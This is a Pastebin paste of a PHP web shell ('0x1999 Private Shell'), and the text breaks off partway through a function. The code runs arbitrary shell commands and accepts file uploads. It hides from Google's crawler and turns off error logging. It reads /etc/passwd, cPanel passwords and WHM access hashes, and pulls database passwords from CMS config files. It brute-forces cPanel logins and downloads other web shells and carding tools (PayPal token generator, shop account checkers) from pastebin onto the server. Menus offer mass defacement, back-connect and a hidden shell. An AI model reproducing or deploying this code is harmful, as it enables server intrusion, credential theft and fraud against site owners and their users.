linuxmoney

bb

Jan 11th, 2018
931
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 100.28 KB | None | 0 0
  1. <?php
  2.  
  3. // 0x1999 Private Shell
  4. // Use your own risk
  5. // Hard coded by 0x1999
  6.  
  7. // Start Bots Locked
  8. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { header('HTTP/1.0 404 Not Found'); exit; }
  9. // End //Bots Locked
  10.  
  11. // Start configuration
  12. $shell_name = '0x Shell';
  13. $shell_slogan = 'The Next JanCox Shell';
  14. $shell_version = '1.1';
  15. $shell_bypass_security = '0';
  16. $show_error = "0";
  17. @session_start();
  18. @ini_set('max_execution_time',0);
  19. @ini_set('output_buffering',0);
  20. @set_time_limit(0);
  21. @set_magic_quotes_runtime(0);
  22. // End configuration
  23.  
  24. // start init
  25. if($show_error == "0"){
  26. @error_reporting(0);
  27. @error_log(0);
  28. @ini_set('error_log',NULL);
  29. @ini_set('log_errors',0);
  30. @ini_set('display_errors', 0);
  31. } else {
  32. ini_set('display_errors', 1);
  33. ini_set('display_startup_errors', 1);
  34. error_reporting(E_ALL);
  35. }
  36.  
  37.  
  38. if(!function_exists('posix_getegid')) {
  39. $user = @get_current_user();
  40. $uid = @getmyuid();
  41. $gid = @getmygid();
  42. $group = "?";
  43. } else {
  44. $uid = @posix_getpwuid(posix_geteuid());
  45. $gid = @posix_getgrgid(posix_getegid());
  46. $user = $uid['name'];
  47. $uid = $uid['uid'];
  48. $group = $gid['name'];
  49. $gid = $gid['gid'];
  50. }
  51. if(@is_dir("/home/$user/public_html/")){
  52. $server_type = "public_html";
  53. } elseif(@is_dir("/var/www/vhosts/")){
  54. $server_type = "vhost";
  55. } else{
  56. $server_type = "unknown";
  57. }
  58.  
  59. //end init
  60.  
  61. //start config list
  62. $ext = array("v1","v2","v3","wp","WP","blog","client","clients","forum","forums","home","new","old","site","portal","test","demo","wordpress","joomla","beta","news","main","shop","mage","magento","sites","cms","secure","support","panel","public");
  63. $configtype = array(
  64. "/wp-config.php" => "Wordpress",
  65. "/config/koneksi.php" => "Lokomedia",
  66. "/forum/config.php" => "phpBB",
  67. "/sites/default/settings.php" => "Drupal",
  68. "/config/settings.inc.php" => "PrestaShop",
  69. "/app/etc/local.xml" => "Magento",
  70. "/admin/config.php" => "OpenCart",
  71. "/application/config/database.php" => "Ellislab",
  72. "/configuration.php" => "Joomla",
  73. "/submitticket.php" => "WHMCS",
  74. "/config.php" => "OtherConfig",
  75. "/db.php" => "DB",
  76. "/db.inc.php" => "DBInc",
  77. "/database.php" => "Database",
  78. "/includes/config.php" => "Vbulletin",
  79. "/db/config.php" => "DBConfig"
  80. );
  81. //end config list
  82.  
  83. //start head process
  84. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  85. @ob_clean();
  86. $file = $_GET['file'];
  87. header('Content-Description: File Transfer');
  88. header('Content-Type: application/octet-stream');
  89. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  90. header('Expires: 0');
  91. header('Cache-Control: must-revalidate');
  92. header('Pragma: public');
  93. header('Content-Length: ' . filesize($file));
  94. readfile($file);
  95. exit;
  96. }
  97. if(isset($_GET['dir']) && ($_GET['dir'] != "")){
  98. $dir = $_GET['dir'];
  99. chdir($_GET['dir']);
  100. } else {
  101. $dir = getcwd();
  102. }
  103. if(isset($_POST['upload'])) {
  104. if(@copy($_FILES['0xfile']['tmp_name'], "$dir/".$_FILES['0xfile']['name']."")){
  105. $actx = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['0xfile']['name']."</b></i>";
  106. } else {
  107. $actx = "<font color=red>failed to upload file</font>";
  108. }
  109. } else {
  110. $actx ="";
  111. }
  112. //end head process
  113. ?>
  114. <!DOCTYPE html>
  115. <html>
  116. <style stype="text/css">
  117. @import url(https://fonts.googleapis.com/css?family=Abel|Baumans);
  118. body {
  119. background: #101010;
  120. color: #f2f2f2;
  121. font-family: Abel;
  122. font-size: 12px;
  123. }
  124.  
  125. body a {
  126. color: #3467BA;
  127. text-decoration: none;
  128. }
  129.  
  130. body a:hover {
  131. text-decoration: underline;
  132. }
  133.  
  134. #main_content {
  135. border: 1px solid #5C7296;
  136. overflow: hidden;
  137. width: 1000px;
  138. height: auto;
  139. padding: 15px;
  140. margin: 0 auto;
  141. background: #0A0A0A;
  142. border-radius: 6px;
  143. -moz-border-radius: 6px;
  144. -webkit-border-radius: 6px;
  145. }
  146.  
  147. .enabled {
  148. color: #7ACC29;
  149. }
  150.  
  151. .enabled a {
  152. color: #7ACC29;
  153. font-weight: normal;
  154. }
  155.  
  156. .disabled {
  157. color: #CC0000;
  158. }
  159.  
  160. .TableHeader_Name {
  161. width: 400px;
  162. padding: 0px 0px 0px 5px;
  163. height: 25px;
  164. font-family: Abel;
  165. background-color: #282828;
  166. border-top-left-radius: 4px;
  167. -moz-border-top-left-radius: 4px;
  168. -webkit-border-top-left-radius: 4px;
  169. }
  170.  
  171. .TableHeader {
  172. width: 100px;
  173. height: 25px;
  174. font-family: Abel;
  175. text-align: center;
  176. background-color: #282828;
  177. }
  178.  
  179. .TableHeaderoptions {
  180. padding: 0px 0px 0px 15px;
  181. width: 200px;
  182. height: 25px;
  183. font-family: Abel;
  184. background-color: #282828;
  185. border-top-right-radius: 4px;
  186. -moz-border-top-right-radius: 4px;
  187. -webkit-border-top-right-radius: 4px;
  188. }
  189.  
  190. .TableLast {
  191. padding: 0px 0px 0px 15px;
  192. width: 200px;
  193. height: 25px;
  194. font-family: Abel;
  195. background-color: #282828;
  196. border-top-right-radius: 4px;
  197. -moz-border-top-right-radius: 4px;
  198. -webkit-border-top-right-radius: 4px;
  199. }
  200.  
  201. .filesize {
  202. color: green;
  203. text-align: center;
  204. }
  205.  
  206. .filenames a {
  207. font-weight: normal;
  208. text-decoration: none;
  209. }
  210.  
  211. .filenames a:hover {
  212. text-decoration: underline;
  213. }
  214.  
  215. .filetr {
  216. background-color: #080808;
  217. }
  218.  
  219. .filetr:hover {
  220. background-color: #282828;
  221. }
  222.  
  223. #options {
  224. font-weight: 200;
  225. font-family: Abel;
  226. margin-left: 10px;
  227. display: block;
  228. }
  229.  
  230. #title {
  231. font-size: 25px;
  232. font-family: arial;
  233. display: block;
  234. padding: 15px 0px 0px 0px;
  235. }
  236.  
  237. .box {
  238. padding: 10px;
  239. background-color: #292929;
  240. border: 1px solid #3467BA;
  241. height: auto;
  242. width: 970;
  243. border-radius: 6px;
  244. -moz-border-radius: 6px;
  245. -webkit-border-radius: 6px;
  246. }
  247.  
  248. .sembunyi {
  249. display: none;
  250. padding: 0;
  251. margin: 0;
  252. }
  253.  
  254. textarea {
  255. background-color: #010101;
  256. color: #f2f2f2;
  257. border: 1px solid #3467BA;
  258. outline: none;
  259. font-size: 11px;
  260. border-radius: 3px;
  261. -moz-border-radius: 3px;
  262. -webkit-border-radius: 3px;
  263. padding: 5px;
  264. width: 970px;
  265. height: 400px;
  266. }
  267.  
  268. input[type=text],
  269. input[type=password],
  270. input[type=submit],
  271. input[type=button] {
  272. background: #010101;
  273. color: #f2f2f2;
  274. margin: 0 4px;
  275. border: 1px solid #3467BA;
  276. outline: none;
  277. font-size: 11px;
  278. border-radius: 3px;
  279. -moz-border-radius: 3px;
  280. -webkit-border-radius: 3px;
  281. font-family: Abel;
  282. font-size: 12px;
  283. }
  284.  
  285. .viewfile {
  286. background: #EDECEB;
  287. color: #000000;
  288. margin: 4px 2px;
  289. padding: 8px;
  290. border-radius: 3px;
  291. -moz-border-radius: 3px;
  292. -webkit-border-radius: 3px;
  293. border: 1px solid #3467BA;
  294. }
  295.  
  296. select {
  297. color: #f2f2f2;
  298. padding: 0;
  299. margin: 0;
  300. border: 1px solid #3467BA;
  301. outline: none;
  302. font-size: 11px;
  303. border-radius: 3px;
  304. -moz-border-radius: 3px;
  305. -webkit-border-radius: 3px;
  306. background: #010101;
  307. overflow: hidden;
  308. font-family: Abel;
  309. font-size: 12px;
  310. }
  311.  
  312. input[type="file"] {
  313. color: #f2f2f2;
  314. padding: 0;
  315. margin: 0;
  316. border: 1px solid #3467BA;
  317. outline: none;
  318. font-size: 11px;
  319. border-radius: 3px;
  320. -moz-border-radius: 3px;
  321. -webkit-border-radius: 3px;
  322. background: #010101;
  323. overflow: hidden;
  324. font-family: Abel;
  325. font-size: 12px;
  326. }
  327.  
  328. .ndelik {
  329. display: none;
  330. padding: 0;
  331. margin: 0;
  332. }
  333.  
  334. form,
  335. table {
  336. /*display: inline;*/
  337. margin: 0px;
  338. padding: 0px;
  339. }
  340. </style>
  341.  
  342. <script type="text/javascript">
  343. function tukar(lama, baru) {
  344. document.getElementById(lama).style.display = 'none';
  345. document.getElementById(baru).style.display = 'block';
  346. }
  347. </script>
  348.  
  349. <link href="http://vignette2.wikia.nocookie.net/regularshow/images/f/fc/Emoticones_-_Pacman.png/revision/latest?cb=20160107170905&amp;path-prefix=es" rel="icon" type="image/x-icon">
  350.  
  351. <?php
  352.  
  353. $ling ="http://".$_SERVER['SERVER_NAME']."".$_SERVER['PHP_SELF']."?create";
  354. $dir = str_replace("\\","/",$dir);
  355. $scdir = explode("/", $dir);
  356. $ds = @ini_get("disable_functions");
  357. $show_ds = (!empty($ds)) ? "<input type='text' name='searchterm' size='30'style='background-color: rgb(41, 41, 41);border: 1px solid rgb(41, 41, 41);height: 12px;color: red;width: 385px;'value='$ds'readonly/>" : "<font color=lime>NONE</font>";
  358. echo "<title>$shell_name</title>";
  359.  
  360. if(isset($_GET['create'])){
  361. function CreateTools($names,$lokasi){
  362. if ( $_GET['create'] == $names ){
  363. $a= "".$_SERVER['SERVER_NAME']."";
  364. $b= dirname($_SERVER['PHP_SELF']);
  365. $c = "/0x1/".$names.".php";
  366. if (file_exists('0x1/'.$names.'.php')){
  367. echo '<script type="text/javascript">alert("Done");window.location.href = "0x1/'.$names.'.php";</script> ';
  368. }
  369. else {mkdir("0x1", 0777);
  370. file_put_contents('0x1/'.$names.'.php', file_get_contents($lokasi));
  371. echo ' <script type="text/javascript">alert("Done");window.location.href = "0x1/'.$names.'.php";</script> ';}}
  372. }
  373. CreateTools("wso","http://pastebin.com/raw/3eh3Gej2");
  374. CreateTools("adminer"."https://www.adminer.org/static/download/4.2.5/adminer-4.2.5.php");
  375. CreateTools("b374k","http://pastebin.com/raw/rZiyaRGV");
  376. CreateTools("injection","http://pastebin.com/raw/nxxL8c1f");
  377. CreateTools("promailerv2","http://pastebin.com/raw/Rk9v6eSq");
  378. CreateTools("gamestopceker","http://pastebin.com/raw/QSnw1JXV");
  379. CreateTools("bukapalapak","http://pastebin.com/raw/6CB8krDi");
  380. CreateTools("tokopedia","http://pastebin.com/dvhzWgby");
  381. CreateTools("encodedecode","http://pastebin.com/raw/wqB3G5eZ");
  382. CreateTools("mailer","http://pastebin.com/raw/9yu1DmJj");
  383. CreateTools("r57","http://pastebin.com/raw/G2VEDunW");
  384. CreateTools("tokenpp","http://pastebin.com/raw/72xgmtPL");
  385. CreateTools("extractor","http://pastebin.com/raw/jQnMFHBL");
  386. CreateTools("bh","http://pastebin.com/raw/3L2ESWeu");
  387. CreateTools("dhanus","http://pastebin.com/raw/v4xGus6X");
  388. }
  389.  
  390. //Start Function
  391. function permissions($file){
  392.  
  393. $perms = @fileperms($file);
  394. if (($perms & 0xC000) == 0xC000) {
  395. $info = 's';
  396. } elseif (($perms & 0xA000) == 0xA000) {
  397. $info = 'l';
  398. } elseif (($perms & 0x8000) == 0x8000) {
  399. $info = '-';
  400. } elseif (($perms & 0x6000) == 0x6000) {
  401. $info = 'b';
  402. } elseif (($perms & 0x4000) == 0x4000) {
  403. $info = 'd';
  404. } elseif (($perms & 0x2000) == 0x2000) {
  405. $info = 'c';
  406. } elseif (($perms & 0x1000) == 0x1000) {
  407. $info = 'p';
  408. } else {
  409. $info = 'u';
  410. }
  411. $info .= (($perms & 0x0100) ? 'r' : '-');
  412. $info .= (($perms & 0x0080) ? 'w' : '-');
  413. $info .= (($perms & 0x0040) ?
  414. (($perms & 0x0800) ? 's' : 'x' ) :
  415. (($perms & 0x0800) ? 'S' : '-'));
  416. $info .= (($perms & 0x0020) ? 'r' : '-');
  417. $info .= (($perms & 0x0010) ? 'w' : '-');
  418. $info .= (($perms & 0x0008) ?
  419. (($perms & 0x0400) ? 's' : 'x' ) :
  420. (($perms & 0x0400) ? 'S' : '-'));
  421. $info .= (($perms & 0x0004) ? 'r' : '-');
  422. $info .= (($perms & 0x0002) ? 'w' : '-');
  423. $info .= (($perms & 0x0001) ?
  424. (($perms & 0x0200) ? 't' : 'x' ) :
  425. (($perms & 0x0200) ? 'T' : '-'));
  426. return $info;
  427. }
  428. function UrlLoop($url,$type){
  429. $urlArray = array();
  430. $ch = curl_init();
  431. curl_setopt($ch, CURLOPT_URL, $url);
  432. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  433. $result = curl_exec($ch);
  434. $regex='|<a.*?href="(.*?)"|';
  435. preg_match_all($regex,$result,$parts);
  436. $links = $parts[1];
  437. foreach($links as $link){
  438. array_push($urlArray, $link);
  439. }
  440. curl_close($ch);
  441. foreach($urlArray as $value){
  442. $lol = "$url$value";
  443. if(preg_match("#$type#is", $lol)) {
  444. echo "$lol\r\n";
  445. }
  446. }
  447. }
  448.  
  449. function anucurl($sites) {
  450. $ch = curl_init($sites);
  451. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  452. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  453. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  454. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  455. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  456. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  457. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  458. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  459. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  460. $data = curl_exec($ch);
  461. curl_close($ch);
  462. return $data;
  463. }
  464. function clearspace($text){
  465. return str_replace(" ","_",$text);
  466. }
  467. function magicboom($text){
  468. if (!get_magic_quotes_gpc()) {
  469. return $text;
  470. }
  471. return stripslashes($text);
  472. }
  473. function ambilKata($param, $kata1, $kata2){
  474. if(strpos($param, $kata1) === FALSE) return FALSE;
  475. if(strpos($param, $kata2) === FALSE) return FALSE;
  476. $start = strpos($param, $kata1) + strlen($kata1);
  477. $end = strpos($param, $kata2, $start);
  478. $return = substr($param, $start, $end - $start);
  479. return $return;
  480. }
  481. function ambil_password($link) {
  482. $pass = "";
  483. $ambil = file_get_contents($link);
  484. if(preg_match("/WordPress/", $ambil)) {
  485. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  486. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  487. $pass .= ambilkata($ambil,"password = '","'")."\n";
  488. } elseif(preg_match("/cmsmember/", $ambil)) {
  489. $pass .= ambilkata($ambil,'dbpasswd = "','"')."\n";
  490. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  491. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  492. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  493. $pass .= ambilkata($ambil,'password = "','"')."\n";
  494. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  495. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  496. } elseif(preg_match("/client/", $ambil)) {
  497. preg_match("/password=(.*)/", $ambil, $pass1);
  498. if(preg_match('/"/', $pass1[1])) {
  499. $pass1[1] = str_replace('"', "", $pass1[1]);
  500. $pass .= $pass1[1]."\n";
  501. }
  502. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  503. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  504. }
  505. return $pass;
  506. }
  507. function w($dir,$perm) {
  508. if(!is_writable($dir)) {
  509. return "<font color=red>".$perm."</font>";
  510. } else {
  511. return "<font color=lime>".$perm."</font>";
  512. }
  513. }
  514. function cekjum($kentu){
  515.  
  516.  
  517. // $it = new RecursiveIteratorIterator($kentu,RecursiveDirectoryIterator::SKIP_DOTS);
  518. $it = new RecursiveIteratorIterator
  519. (
  520. new RecursiveDirectoryIterator($kentu)
  521. );
  522. // if($it-> DirectoryIterator::isDot()){
  523. // echo "cok";
  524. // }
  525.  
  526. // $index = array_search('..',$it);
  527. // if($index !== FALSE){
  528. // unset($it[$index]);
  529. // }
  530.  
  531.  
  532. foreach ($it as $filename) {
  533. $file=realpath(dirname($filename));
  534. if($file == ".."){
  535. continue;
  536. }
  537. if (is_writable($filename)){
  538.  
  539. $perm = permissions($file);
  540. $perm = w($file,$perm);
  541. $permd = permissions($filename);
  542. $permd = w($filename,$permd);
  543.  
  544. if(is_dir($filename)){
  545. if(is_writable($file)){
  546. echo "[ D ] [$perm]\t\t<a href='?dir=$file'>$file</a><font color='lime'>is writable</font><br>";
  547. }
  548. }
  549. else {
  550. if(is_writable($filename)){
  551. echo "[ F ] [$permd]\t\t<a href='?act=edit&dir=$file&file=$filename'>$filename</a><font color='lime'>is writable</font><br>";
  552. }
  553. }
  554.  
  555. }
  556. }
  557. }
  558. function exe($cmd) {
  559. if(function_exists('system')) {
  560. @ob_start();
  561. @system($cmd);
  562. $buff = @ob_get_contents();
  563. @ob_end_clean();
  564. return $buff;
  565. } elseif(function_exists('exec')) {
  566. @exec($cmd,$results);
  567. $buff = "";
  568. foreach($results as $result) {
  569. $buff .= $result;
  570. } return $buff;
  571. } elseif(function_exists('passthru')) {
  572. @ob_start();
  573. @passthru($cmd);
  574. $buff = @ob_get_contents();
  575. @ob_end_clean();
  576. return $buff;
  577. } elseif(function_exists('shell_exec')) {
  578. $buff = @shell_exec($cmd);
  579. return $buff;
  580. }
  581. }
  582.  
  583. //End Function
  584.  
  585. //start bypasser
  586.  
  587.  
  588. // $etcpasswd = etcpasswd();
  589.  
  590. $etcpasswd = @file_get_contents('/etc/passwd');
  591. if(!$etcpasswd){
  592. $etcpasswd = exe('cat /etc/passwd');
  593. }
  594. // end bypasser
  595.  
  596.  
  597.  
  598. /////////////////////////////////////
  599.  
  600. $sport = $_SERVER['SERVER_PORT'];
  601. $d0mains = @file("/etc/named.conf");
  602. $users=@file('/etc/passwd');
  603. if($d0mains){
  604. $count;
  605. foreach($d0mains as $d0main){
  606. if(@ereg("zone",$d0main)){
  607. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  608. flush();
  609. if(strlen(trim($domains[1][0])) > 2){
  610. flush();
  611. $count++;
  612. }
  613. }
  614. }
  615. $count2=$count/2;
  616. } else {
  617. $count2="??";
  618. }
  619. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  620. echo "
  621. <body>
  622. <div id='main_content'><span id='title'><font face='Baumans'>$shell_name</font> </span><i>$shell_slogan</i><br><br><div class='box'>
  623. ";
  624. echo'
  625. <table cellspacing="0" cellpadding="0">
  626. <colgroup>
  627. <col style="width: 499px">
  628. <col style="width: 599px">
  629. </colgroup>
  630. <tr>
  631. <td nowrap>Server Name:'.php_uname().'</td>
  632. <td align="right"><form><div class="select-style">
  633. <select onchange="if (this.value) window.open(this.value);">
  634. <option selected="selected" value=""> <i>Tools Creator </option>
  635. <option value="'.$ling.'=wso"><i>WSO 2.8.1</option>
  636. <option value="'.$ling.'=injection"><i>1n73ction v3</option>
  637. <option value="'.$ling.'=wk">WHMCS Killer</option>
  638. <option value="'.$ling.'=adminer">Adminer</option>
  639. <option value="'.$ling.'=b374k">b374k Shell</option>
  640. <option value="'.$ling.'=b374k323">b374k 3.2</option>
  641. <option value="'.$ling.'=bh">BlackHat Shell</option>
  642. <option value="'.$ling.'=dhanus">Dhanush Shell</option>
  643. <option value="'.$ling.'=r57">R57 Shell</option>
  644. <option value="'.$ling.'=encodedecode">Encode Decode</option>
  645. <option value="'.$ling.'=r57">R57 Shell</option>
  646. </select>
  647. <select onchange="if (this.value) window.open(this.value);">
  648. <option selected="selected" value=""> Tools Carder </option>
  649. <option value="'.$ling.'=extractor">DB Email Extractor</option>
  650. <option value="'.$ling.'=promailerv2">Pro Mailer V2</option>
  651. <option value="'.$ling.'=bukalapak">BukaLapak Checker</option>
  652. <option value="'.$ling.'=tokopedia">TokoPedia Checker</option>
  653. <option value="'.$ling.'=tokenpp">Paypal Token Generator</option>
  654. <option value="'.$ling.'=mailer">Mailer</option>
  655. <option value="'.$ling.'=gamestopceker">GamesTop Checker</option>
  656. </select></div>
  657. <noscript><input type="submit" value="Submit"></noscript>
  658. </form></td>
  659. </tr>
  660. <tr>
  661. <td>User :<font color=lime>'.$user.'</font> ('.$uid.') Group : <font color=lime>'.$group.'</font> ('.$gid.')</td>
  662. <td align="right">';
  663. if($server_type == "public_html"){
  664. if (file_exists('/home/'.$user.'/.my.cnf')){
  665. $cp = file_get_contents('/home/'.$user.'/.my.cnf');
  666. $cp = ambilkata($cp,'password="','"');
  667. echo 'Cpanel : Username <font color="lime">(</font>'.$user.'<font color="lime">)</font> Password <font color="lime">(</font>'.$cp.'<font color="lime">)</font>';
  668. }}
  669. echo '
  670. </td>
  671. </tr>
  672. <tr>
  673. <td>Server IP :<font color=lime>'.gethostbyname($_SERVER["HTTP_HOST"]).'</font> <span class="enabled"><a href="https://www.bing.com/search?q=IP:'.gethostbyname($_SERVER["HTTP_HOST"]).'" target="_blank">[BING]</a></span> <span class="enabled"><a href="https://centralops.net/co/domaindossier.aspx?addr='.gethostbyname($_SERVER["HTTP_HOST"]).'&dom_whois=true&dom_dns=true&traceroute=true&net_whois=true&svc_scan=true" target="_blank">[Dossier]</a></span> | Port : <font color=lime>'.$sport.'</font> | Your IP: <font color=lime>'.$_SERVER["REMOTE_ADDR"].'</font></td>
  674. <td align="right">';
  675. if($server_type == "public_html"){
  676. if (file_exists('/home/'.$user.'/.accesshash')){
  677. $whm = file_get_contents('/home/'.$user.'/.accesshash');
  678. $whm = preg_replace( '/\s+/' , '' , $whm );
  679. echo '<input type="text" size="30" value="WHM '.$user.':'.$whm.'">';
  680. } }
  681. echo '
  682. </td>
  683. </tr>
  684. <tr>
  685. <td>Server Type : '.$server_type.' | Website :<font color=lime> '.$count2.' </font> Domains</td>
  686. </tr>
  687. <tr>
  688. <td>Safe Mode: '.$sm.'</td>
  689. </tr>
  690. <tr>
  691. <td>Disable Functions:'.$show_ds.'</td>
  692. </tr>
  693. <tr>
  694. <td>Server Software: '.$_SERVER["SERVER_SOFTWARE"].' <span class="enabled"><a href="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description='.$_SERVER["SERVER_SOFTWARE"].'&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=" target="_blank">[Exploit DB]</a></span>
  695. </td>
  696. </tr>
  697. <tr>
  698. <td>Directory : ';
  699. foreach($scdir as $c_dir => $cdir) {
  700. echo "<a href='?dir=";
  701. for($i = 0; $i <= $c_dir; $i++) {
  702. echo $scdir[$i];
  703. if($i != $c_dir) {
  704. echo "/";
  705. }
  706. }
  707. echo "'>$cdir</a>/";
  708. }
  709. echo"</td>
  710. <td align='right'><form method='post' enctype='multipart/form-data'><input type='file' name='0xfile'><input type='submit' value='upload' name='upload'></form></td>
  711. </tr>
  712. <tr>
  713. <td><form method='post' action='?dir=$dir&do=cmd' style='float: left;'>
  714. Command :
  715. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  716. </form><p></p>
  717. </td>
  718. <td align='right'>".$actx."</td>
  719. </tr>
  720. </table></div>";
  721. echo '<a href="?">Home</a> / ';
  722. echo "<a href='?dir=".$dir."&do=config'>Config</a> / ";
  723. echo "<a href='?dir=".$dir."&do=jump'>Jump</a> / ";
  724. echo "<a href='?dir=".$dir."&do=symlink'>Sym</a> / ";
  725. echo "<a href='?dir=".$dir."&do=cpanel'>Cpanel</a> / ";
  726. echo "<a href='?dir=".$dir."&do=symlink'>Sym</a> / ";
  727. echo "<a href='?dir=".$dir."&do=mass_deface'>Mass</a> / ";
  728. echo "<a href='?dir=".$dir."&do=mirror'>Mirror</a> / ";
  729. echo "<a href='?dir=".$dir."&do=cgi'>Cgi</a> / ";
  730. echo "<a href='?dir=".$dir."&do=bc'>BC</a> / ";
  731. echo "<a href='?dir=".$dir."&do=about'>About</a> / ";
  732. echo "<a href='?dir=".$dir."&do=serverinfo'>Server Info</a> / ";
  733. echo "<a href='?do=deleteme'>Self Remove</a> / ";
  734. echo "<a href='?dir=".$dir."&do=ndelikne'>Hidden Shell</a> / ";
  735. echo "<a href='?dir=".$dir."&do=crp'>Config ResPass</a> / ";
  736. echo "<a href='?dir=".$dir."&do=grabpass'>Auto CU Joomla</a> / ";
  737. echo "<a href='?dir=".$dir."&do=hek'>Deface</a> / ";
  738. echo '<hr>';
  739. /////////////////////////////////////
  740. // if(isset($_GET['act']) && ($_GET['act'] == ''))
  741.  
  742.  
  743.  
  744. // START TOOLS SCRIPT
  745. if(isset($_GET['act']) && ($_GET['act'] == 'delete')) {
  746. $delete = unlink($_GET['file']);
  747. if($delete) {
  748. $act = "<script>window.location='?dir=".$dir."';</script>";
  749. } else {
  750. $act = "<font color=red>permission denied</font>";
  751. }
  752. echo $act;
  753. }
  754.  
  755. elseif(isset($_GET['act']) && ($_GET['act'] == 'delete_dir')) {
  756. function Delete($path)
  757. {
  758. $path = (substr($path,-1)=='/') ? $path:$path.'/';
  759. $dh = opendir($path);
  760. while ( ($item = readdir($dh) ) !== false) {
  761. $item = $path.$item;
  762. if ( (basename($item) == "..") || (basename($item) == ".") )
  763. continue;
  764. $type = filetype($item);
  765. if ($type == "dir")
  766. Delete($item);
  767. else
  768. @unlink($item);
  769. }
  770. closedir($dh);
  771. @rmdir($path);}
  772. $delete_dir = Delete($dir);
  773. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  774. echo $act;
  775. }
  776. elseif(isset($_POST['do_rename'])) {
  777. $rename = rename($_POST['oldname'], "$dir/".htmlspecialchars($_POST['rename'])."");
  778. if($rename) {
  779. $act = "<script>window.location='?dir=".$dir."';</script>";
  780. } else {
  781. $act = "<font color=red>permission denied</font>";
  782. }
  783. echo "".$act."<br>";
  784. }
  785. elseif(isset($_POST['dir_rename'])) {
  786. $dir_rename = rename($dir."/".$_POST['oldname'], "".$dir."/".htmlspecialchars($_POST['fol_rename'])."");
  787. if($dir_rename) {
  788. $act = "<script>window.location='?dir=".$dir."';</script>";
  789. } else {
  790. $act = "<font color=red>permission denied</font>";
  791. }
  792. echo "".$act."<br>";
  793. }
  794. elseif(isset($_GET['act']) && ($_GET['act'] == 'newfolder')) {
  795. if($_POST['new_save_folder']) {
  796. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  797. if(!mkdir($new_folder)) {
  798. $act = "<font color=red>permission denied</font>";
  799. } else {
  800. $act = "<script>window.location='?dir=".$dir."';</script>";
  801. }
  802. }
  803. echo $act;
  804. }
  805. elseif(isset($_GET['act']) && ($_GET['act'] == 'view')) {
  806. if(is_file($_GET['file'])){
  807. if(!isset($file)) $file = magicboom($_GET['file']);
  808. echo "Filename : <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  809. echo "<div class=\"viewfile\">";
  810. $file = wordwrap(@file_get_contents($file),"240","\n");
  811. @highlight_string($file);
  812. echo "</div>";
  813. }elseif(is_dir($_GET['view'])){
  814. echo showdir($dir,$prompt);
  815. }
  816. }
  817.  
  818.  
  819. //end act
  820.  
  821. elseif(isset($_GET['do']) && ($_GET['do'] == 'cpanel')) {
  822. if($_POST['crack']) {
  823. $usercp = explode("\r\n", $_POST['user_cp']);
  824. $passcp = explode("\r\n", $_POST['pass_cp']);
  825. $i = 0;
  826. foreach($usercp as $ucp) {
  827. foreach($passcp as $pcp) {
  828. if(@mysql_connect('localhost', $ucp, $pcp)) {
  829. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  830. } else {
  831. $_SESSION[$ucp] = "1";
  832. $_SESSION[$pcp] = "1";
  833. $i++;
  834. echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  835. }
  836. }
  837. }
  838. session_unset();
  839. session_destroy();
  840. }
  841. if($i == 0) {
  842. } else {
  843. echo "<br>Nemu ".$i." Cpanel by <font color=lime>0x1999</font>";
  844. }
  845. } else {
  846. echo "<center>
  847. <form method='post'>
  848. USER: <br>
  849. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  850. $_usercp = fopen("/etc/passwd","r");
  851. while($getu = fgets($_usercp)) {
  852. if($getu == '' || !$_usercp) {
  853. echo "<font color=red>Can't read /etc/passwd</font>";
  854. } else {
  855. preg_match_all("/(.*?):x:/", $getu, $u);
  856. foreach($u[1] as $user_cp) {
  857. if(is_dir("/home/$user_cp/public_html")) {
  858. echo "$user_cp\n";
  859. }
  860. }
  861. }
  862. }
  863. echo "</textarea><br>
  864. PASS: <br>
  865. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  866. function cp_pass($dir) {
  867. $pass = "";
